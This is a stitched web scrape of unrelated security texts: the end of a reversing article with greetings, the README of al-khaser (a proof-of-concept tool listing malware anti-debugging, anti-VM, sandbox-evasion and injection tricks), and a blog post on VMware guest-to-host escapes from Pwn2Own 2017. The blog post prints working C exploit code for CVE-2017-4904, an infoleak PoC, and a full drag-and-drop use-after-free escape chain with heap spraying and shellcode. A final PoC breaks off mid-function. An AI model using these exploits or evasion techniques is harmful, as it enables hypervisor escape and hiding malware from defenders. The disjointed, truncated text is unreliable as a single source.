  • The number of registers, and a pointer to the const char * array of register names (both laid out in B.3).
  • The function begin and end sequences described in B.7.2. We can set these to NULL.
  • The number of mnemonics, and a pointer to the instruc_t array of mnemonic names (both laid out in B.2).

 

 Appendix C: Obligatory Greets

TheHyper: Very innovative, good work! You keep making them, I’ll keep breaking them.

blorght and Zen: Two of my favorite people, with or without the charming accents. Way too talented and more than a step or two over the edge. Stay just the way you are: I love both of you.

Nicholas Brulez: My bro the PE killer 🙂 I hope we get to meet up again soon. I don’t have to tell you to keep kicking ass, mate.

Neural Noise: One of my best friends, and a very gracious host. I can’t wait to meet up again in the world’s most alluring mafia-run slum that is Napoli (what a crazy city!). You bring the beautiful women, and I’ll bring my bummy self, and we can have panic attacks in traffic waititng for the party to start ;-). Stay cool, man! 🙂

Solar Eclipse: Congrats on the Pietrek thing!

spoonm: Thanks for the crash space and the informed conversation, and I’m looking forward to see what you publish next, too.

Pedram: For being the modern-day Fravia of OpenRCE and editing this tripe.

Rossi: For the much-needed proofreading.

lin0xx: Calm down!

LeetNet, kw, and upb: Self-explanatory.

Skape: For uninformed and for rocking.

Finally, to all true friends everywhere: I couldn’t do it without you.

Anti-VM techniques — Hyper-V/VPC registry key + WMI queries on Win32_BIOS, Win32_ComputerSystem, MSAcpi_ThermalZoneTemperature, more MAC for Xen, Parallels

Introduction

al-khaser is a PoC «malware» application with good intentions that aims to stress your anti-malware system. It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar.

Logo

Download

You can download the latest release here.

Possible uses

  • You are making an anti-debug plugin and you want to check its effectiveness.
  • You want to ensure that your sandbox solution is hidden enough.
  • Or you want to ensure that your malware analysis environment is well hidden.

Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don’t hesitate to contribute.

Features

Anti-debugging attacks

  • IsDebuggerPresent
  • CheckRemoteDebuggerPresent
  • Process Environement Block (BeingDebugged)
  • Process Environement Block (NtGlobalFlag)
  • ProcessHeap (Flags)
  • ProcessHeap (ForceFlags)
  • NtQueryInformationProcess (ProcessDebugPort)
  • NtQueryInformationProcess (ProcessDebugFlags)
  • NtQueryInformationProcess (ProcessDebugObject)
  • NtSetInformationThread (HideThreadFromDebugger)
  • NtQueryObject (ObjectTypeInformation)
  • NtQueryObject (ObjectAllTypesInformation)
  • CloseHanlde (NtClose) Invalide Handle
  • SetHandleInformation (Protected Handle)
  • UnhandledExceptionFilter
  • OutputDebugString (GetLastError())
  • Hardware Breakpoints (SEH / GetThreadContext)
  • Software Breakpoints (INT3 / 0xCC)
  • Memory Breakpoints (PAGE_GUARD)
  • Interrupt 0x2d
  • Interrupt 1
  • Parent Process (Explorer.exe)
  • SeDebugPrivilege (Csrss.exe)
  • NtYieldExecution / SwitchToThread
  • TLS callbacks
  • Process jobs
  • Memory write watching

Anti-Dumping

  • Erase PE header from memory
  • SizeOfImage

Timing Attacks [Anti-Sandbox]

  • RDTSC (with CPUID to force a VM Exit)
  • RDTSC (Locky version with GetProcessHeap & CloseHandle)
  • Sleep -> SleepEx -> NtDelayExecution
  • Sleep (in a loop a small delay)
  • Sleep and check if time was accelerated (GetTickCount)
  • SetTimer (Standard Windows Timers)
  • timeSetEvent (Multimedia Timers)
  • WaitForSingleObject -> WaitForSingleObjectEx -> NtWaitForSingleObject
  • WaitForMultipleObjects -> WaitForMultipleObjectsEx -> NtWaitForMultipleObjects (todo)
  • IcmpSendEcho (CCleaner Malware)
  • CreateWaitableTimer (todo)
  • CreateTimerQueueTimer (todo)
  • Big crypto loops (todo)

Human Interaction / Generic [Anti-Sandbox]

  • Mouse movement
  • Total Physical memory (GlobalMemoryStatusEx)
  • Disk size using DeviceIoControl (IOCTL_DISK_GET_LENGTH_INFO)
  • Disk size using GetDiskFreeSpaceEx (TotalNumberOfBytes)
  • Mouse (Single click / Double click) (todo)
  • DialogBox (todo)
  • Scrolling (todo)
  • Execution after reboot (todo)
  • Count of processors (Win32/Tinba — Win32/Dyre)
  • Sandbox known product IDs (todo)
  • Color of background pixel (todo)
  • Keyboard layout (Win32/Banload) (todo)

Anti-Virtualization / Full-System Emulation

  • Registry key value artifacts
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VBOX)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (QEMU)
    • HARDWARE\Description\System (SystemBiosVersion) (VBOX)
    • HARDWARE\Description\System (SystemBiosVersion) (QEMU)
    • HARDWARE\Description\System (VideoBiosVersion) (VIRTUALBOX)
    • HARDWARE\Description\System (SystemBiosDate) (06/23/99)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemManufacturer) (VMWARE)
    • SYSTEM\ControlSet001\Control\SystemInformation (SystemProductName) (VMWARE)
  • Registry Keys artifacts
    • HARDWARE\ACPI\DSDT\VBOX__ (VBOX)
    • HARDWARE\ACPI\FADT\VBOX__ (VBOX)
    • HARDWARE\ACPI\RSDT\VBOX__ (VBOX)
    • SOFTWARE\Oracle\VirtualBox Guest Additions (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxGuest (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxMouse (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxService (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxSF (VBOX)
    • SYSTEM\ControlSet001\Services\VBoxVideo (VBOX)
    • SOFTWARE\VMware, Inc.\VMware Tools (VMWARE)
    • SOFTWARE\Wine (WINE)
    • SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters (HYPER-V)
  • File system artifacts
    • «system32\drivers\VBoxMouse.sys»
    • «system32\drivers\VBoxGuest.sys»
    • «system32\drivers\VBoxSF.sys»
    • «system32\drivers\VBoxVideo.sys»
    • «system32\vboxdisp.dll»
    • «system32\vboxhook.dll»
    • «system32\vboxmrxnp.dll»
    • «system32\vboxogl.dll»
    • «system32\vboxoglarrayspu.dll»
    • «system32\vboxoglcrutil.dll»
    • «system32\vboxoglerrorspu.dll»
    • «system32\vboxoglfeedbackspu.dll»
    • «system32\vboxoglpackspu.dll»
    • «system32\vboxoglpassthroughspu.dll»
    • «system32\vboxservice.exe»
    • «system32\vboxtray.exe»
    • «system32\VBoxControl.exe»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vm3dmp.sys»
    • «system32\drivers\vmci.sys»
    • «system32\drivers\vmhgfs.sys»
    • «system32\drivers\vmmemctl.sys»
    • «system32\drivers\vmmouse.sys»
    • «system32\drivers\vmrawdsk.sys»
    • «system32\drivers\vmusbmouse.sys»
  • Directories artifacts
    • «%PROGRAMFILES%\oracle\virtualbox guest additions\»
    • «%PROGRAMFILES%\VMWare\»
  • Memory artifacts
    • Interupt Descriptor Table (IDT) location
    • Local Descriptor Table (LDT) location
    • Global Descriptor Table (GDT) location
    • Task state segment trick with STR
  • MAC Address
    • «\x08\x00\x27» (VBOX)
    • «\x00\x05\x69» (VMWARE)
    • «\x00\x0C\x29» (VMWARE)
    • «\x00\x1C\x14» (VMWARE)
    • «\x00\x50\x56» (VMWARE)
    • «\x00\x1C\x42» (Parallels)
    • «\x00\x16\x3E» (Xen)
  • Virtual devices
    • «\\.\VBoxMiniRdrDN»
    • «\\.\VBoxGuest»
    • «\\.\pipe\VBoxMiniRdDN»
    • «\\.\VBoxTrayIPC»
    • «\\.\pipe\VBoxTrayIPC»)
    • «\\.\HGFS»
    • «\\.\vmci»
  • Hardware Device information
    • SetupAPI SetupDiEnumDeviceInfo (GUID_DEVCLASS_DISKDRIVE)
      • QEMU
      • VMWare
      • VBOX
      • VIRTUAL HD
  • System Firmware Tables
    • SMBIOS string checks (VirtualBox)
    • SMBIOS string checks (VMWare)
    • SMBIOS string checks (Qemu)
    • ACPI string checks (VirtualBox)
    • ACPI string checks (VMWare)
    • ACPI string checks (Qemu)
  • Driver Services
    • VirtualBox
    • VMWare
  • Adapter name
    • VMWare
  • Windows Class
    • VBoxTrayToolWndClass
    • VBoxTrayToolWnd
  • Network shares
    • VirtualBox Shared Folders
  • Processes
    • vboxservice.exe (VBOX)
    • vboxtray.exe (VBOX)
    • vmtoolsd.exe(VMWARE)
    • vmwaretray.exe(VMWARE)
    • vmwareuser(VMWARE)
    • VGAuthService.exe (VMWARE)
    • vmacthlp.exe (VMWARE)
    • vmsrvc.exe(VirtualPC)
    • vmusrvc.exe(VirtualPC)
    • prl_cc.exe(Parallels)
    • prl_tools.exe(Parallels)
    • xenservice.exe(Citrix Xen)
    • qemu-ga.exe (QEMU)
  • WMI
    • SELECT * FROM Win32_Bios (SerialNumber) (GENERIC)
    • SELECT * FROM Win32_PnPEntity (DeviceId) (VBOX)
    • SELECT * FROM Win32_NetworkAdapterConfiguration (MACAddress) (VBOX)
    • SELECT * FROM Win32_NTEventlogFile (VBOX)
    • SELECT * FROM Win32_Processor (NumberOfCores) (GENERIC)
    • SELECT * FROM Win32_LogicalDisk (Size) (GENERIC)
    • SELECT * FROM Win32_Computer (Model and Manufacturer) (GENERIC)
    • SELECT * FROM MSAcpi_ThermalZoneTemperature CurrentTemperature) (GENERIC)
  • DLL Exports and Loaded DLLs
    • avghookx.dll (AVG)
    • avghooka.dll (AVG)
    • snxhk.dll (Avast)
    • kernel32.dll!wine_get_unix_file_nameWine (Wine)
    • sbiedll.dll (Sandboxie)
    • dbghelp.dll (MS debugging support routines)
    • api_log.dll (iDefense Labs)
    • dir_watch.dll (iDefense Labs)
    • pstorec.dll (SunBelt Sandbox)
    • vmcheck.dll (Virtual PC)
    • wpespy.dll (WPE Pro)
  • CPU
    • Hypervisor presence using (EAX=0x1)
    • Hypervisor vendor using (EAX=0x40000000)
      • «KVMKVMKVM\0\0\0» (KVM)
        • «Microsoft Hv»(Microsoft Hyper-V or Windows Virtual PC)
        • «VMwareVMware»(VMware)
        • «XenVMMXenVMM»(Xen)
        • «prl hyperv «( Parallels) -«VBoxVBoxVBox»( VirtualBox)

Anti-Analysis

  • Processes
    • OllyDBG / ImmunityDebugger / WinDbg / IDA Pro
    • SysInternals Suite Tools (Process Explorer / Process Monitor / Regmon / Filemon, TCPView, Autoruns)
    • Wireshark / Dumpcap
    • ProcessHacker / SysAnalyzer / HookExplorer / SysInspector
    • ImportREC / PETools / LordPE
    • JoeBox Sandbox

Macro malware attacks

  • Document_Close / Auto_Close.
  • Application.RecentFiles.Count

Code/DLL Injections techniques

  • CreateRemoteThread
  • SetWindowsHooksEx
  • NtCreateThreadEx
  • RtlCreateUserThread
  • APC (QueueUserAPC / NtQueueApcThread)
  • RunPE (GetThreadContext / SetThreadContext)

Contributors

References

A bunch of Red Pills: VMware Escapes

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for cloud, and VMware Workstation and Fusion for Desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to a great deal to offer this isolation, especially on the ESXi product where virtual machines of different actors can potentially run on the same hardware. So a strong isolation of is paramount importance.

Recently at Pwn2Own the “Virtualization” category was introduced, and VMware was among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from a guest to the host from a unprivileged account, resulting in executing code on the host, breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how VMware works?

In a nutshell it often uses (but they are not strictly required) CPU and memory hardware virtualization technologies, so a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and Memory, it also requires lot of other Hardware to work properly and be useful.

This point is very important because it will consist of one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task. It’s easily realized by reading any datasheet for hardware software interface for a PC hardware device.

VMware will trap on I/O access on this virtual device and it needs to emulate all those low level operations correctly, since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore if you ever used VMware you might have noticed its copy paste capabilities, and shared folders. How those are implemented?

To summarize, in this blog post we will cover quite some bugs. Both in this “backdoor” functionalities that support those “extra” services such as C&P, and one in a virtualized device.

Altough recently lot of VMware blogpost and presentations were released, we felt the need to write our own for the following reasons:

  • First, no one ever talked correctly about our Pwn2Own bugs, so we want to shed light on them.
  • Second, some of those published resources either lack of details or code.

So we hope you will enjoy our blogpost!

We will begin with some background informations to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components, we will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere.

  • VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run and also handles all the tasks which are impossible to perform from the host ring 3 for example.
  • vmnat: vmnat is responsible for the network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks.
  • vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles lot of tasks which are relevant for this blogpost, including lot of the device emulation, and backdoor requests handling. The result of the exploitation of the chains we will present will result in code execution on the host in the context of vmware-vmx.

Backdoor

The so called backdoor, it’s not actually a “backdoor”, it’s simply a mechanism implemented in VMware for guest-host and host-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

Basically at the lower level, the backdoor consists of 2 IO ports 0x5658 and 0x5659, the first for “traditional” communication, the other one for “high bandwidth” ones.

The guest issues in/out instructions on those ports with some registers convention and it’s able to communicate with the VMware running on the host.

The hypervisor will trap and service the request.

On top of this low level mechanism, vmware implemented some more convenient high level protocols, we encourage you to check the open-vm-tools repository to discover those since they were covered extensively elsewhere we will not spend too much time covering the details.
Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc.

The fundamental points to remember are:

  • It’s a interface guest-host that we can use
  • It exposes complex services and functionalities.
  • Lot of these functionalities can be used from ring3 in the guest VM

xHCI

xHCI (aka eXtensible Host Controller Interface) is a specification of a USB host controller (normally implemented in hardware in normal PC) by Intel which supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it’s often present:

1
00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space.

This very low level interface is the one used by the OS kernel driver in order to schedule usb work, and receive data and all the tasks related to USB.

Just by looking at the specifications alone, which are more than 600 pages, it’s no surprise that this piece of hardware and its interface are very complex, and the specifications just covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon.

Often to speak directly with the hardware (and by consequence also virtualized hardware), you need to run in ring0 in the guest. That’s why (as you will see in the next paragraphs) we used a Windows Kernel LPE inside the VM.

Mitigations

VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc.

More advanced Windows mitigations such as CFG, Microsoft version of Control Flow Integrity and others, are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeting VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.

The following vulnerabilities were identified and analyzed:

  • XHCI: CVE-2017-4904 critical Uninitialized stack value leading to arbitrary code execution
  • CVE-2017-4905 moderate Uninitialized memory read leading to information disclosure

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability residing in the emulated XHCI device, when updating the changes of Device Context into the guest physical memory.

The XHCI reports some status info to system software through “Device Context” structure. The address of a Device Context is in the DCBAA (Device Context Base Address Array), whose address is in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and DCBAA resides in the physical RAM. And the XHCI device will keep an internal cache of the Device Context and only updates the one in physical memory when some changes happen. When updating the Device Context, the virtual machine monitor will map the guest physical memory containing the Device Context into the memory space of the monitor process, then do the update. However the mapping could fail and leave the result variable untouched. The code does not take precaution against it and directly uses the result as a destination address for memory writing, resulting an uninitialized variable vulnerability.

To trigger this bug, the following steps should be taken:

  1. Issue a “Enable Slot” command to XHCI. Get the result slot number from Event TRB.
  2. Set the DCBAAP to point to a controlled buffer.
  3. Put some invalid physical address, eg. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer.
  4. Issue an “Address Device” command. The XHCI will read the base address of Device Context from DCBAA to an internal cache and the value is an controlled invalid address.
  5. Issue an “Configure Endpoint” command. Trigger the bug when XHCI updates the corresponding Device Context.

The uninitialized variable resides on the stack. Its value can be controlled in the “Configure Endpoint” command with one of the Endpoint Context of the Input Context which is also on the stack. Therefore we can control the destination address of the write. And the contents to be written are from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting a write-what-where primitive. By combining with the info leak vulnerability, we can overwrite some function pointers and finally rop to get arbitrary code execution.

Exploit code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground) return;
    playground[0] = 0;
    uint64 *dcbaa = (uint64*)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;
    
    playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context*)playground;
    
    playground += sizeof(input_context);
    playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;
    
    trb_t *cmd = (trb_t*)cring;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
    
    cmd = (trb_t*)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void*)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db.doorbell[0] = 0;
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability present in the Backdoor callback handler. A buffer will be allocated on the stack when processing the backdoor requests. This buffer should be initialized in the BDOORHB callback. But when requesting invalid commands, the callback fails to properly clear the buffer, causing the uninitialized content of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host. The successful rate to exploit this bug is 100%.

Credits to JunMao of Tencent PCManager.

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from vmware-vmx stack
    // 
    ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}

Behind the scenes of Pwn2Own 2017

Exploit the UAF bug in VMware Workstation Drag n Drop with single bug

By fuzzing VMware workstation, we found this bug and complete the whole stable exploit chain using this single bug in the last few days of Feb. 2017. Unfortunately this bug was patched in VMware workstation 12.5.3 released on 9 Mar. 2017. After we noticed few papers talked about this bug, and VMware even have no CVE id assigned to this bug. That’s such a pity because it’s the best bug we have ever seen in VMware workstaion, and VMware just patched it quietly. Now we’re going to talk about the way to exploit VMware Workstation with this single bug.

Exploit Code

This exploit successful rate is approximately 100%.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }

    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }

        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2);                                 //free
        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
               Message_Close(chan); //free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630)   //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);

    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};

            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.

After VMware released 12.5.3, we continued auditing the DnD and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known by almost every participants of VMware category in Pwn2own 2017. Here we present the PoC of this bug.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

